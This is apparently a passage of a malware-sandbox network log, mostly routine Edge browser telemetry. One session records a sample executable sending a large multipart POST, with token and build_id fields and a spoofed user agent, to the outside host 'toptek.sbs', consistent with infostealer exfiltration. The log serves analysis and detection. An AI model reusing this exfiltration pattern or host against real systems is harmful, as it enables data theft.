                                                                                                                                                                                                                                                                                    2024-12-23 05:58:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:02 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    32192.168.2.54984118.165.220.1104437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:02 UTC925OUTGET /b?rn=1734933482036&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1527A764E6A86BDB2DE6B23AE7AF6A4B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:03 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:02 GMT
                                                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                    Location: /b2?rn=1734933482036&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1527A764E6A86BDB2DE6B23AE7AF6A4B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                    set-cookie: UID=1B5aaed1ef292e4cd07b08d1734933482; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                    set-cookie: XID=1B5aaed1ef292e4cd07b08d1734933482; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                    Via: 1.1 5008327c23740ce2f9d9ed54c8a489e8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: jfUNmv2GAoYVzmXVfm5S6sqvX2QZnNnHbz8zDS2VRiq4nD4emVYDig==


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    33192.168.2.54988294.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:03 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----UKNYCTR900ZU3EU3W4WB
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 131557
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:03 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 55 4b 4e 59 43 54 52 39 30 30 5a 55 33 45 55 33 57 34 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 4e 59 43 54 52 39 30 30 5a 55 33 45 55 33 57 34 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 4e 59 43 54 52 39 30 30 5a 55 33 45 55 33 57 34 57 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------UKNYCTR900ZU3EU3W4WBContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------UKNYCTR900ZU3EU3W4WBContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------UKNYCTR900ZU3EU3W4WBCont
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:03 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:05 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:05 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    34192.168.2.54988820.189.173.144437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:04 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734933482034&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 3869
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: _C_ETH=1; USRLOC=; MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B; _EDGE_S=F=1&SID=274477A862C669B72E1F62F6631E6834; _EDGE_V=1
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:04 UTC3869OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 33 54 30 35 3a 35 38 3a 30 32 2e 30 32 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 34 34 64 64 61 65 36 31 2d 61 37 34 64 2d 34 37 63 39 2d 39 32 30 35 2d 35 62 35 62 30 30 30 35 33 31 38 64 22 2c 22 65 70 6f 63 68 22 3a 22 31 34 30 31 30 31 36 31 36 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-23T05:58:02.029Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"44ddae61-a74d-47c9-9205-5b5b0005318d","epoch":"1401016166"},"app":{"locale
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:05 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
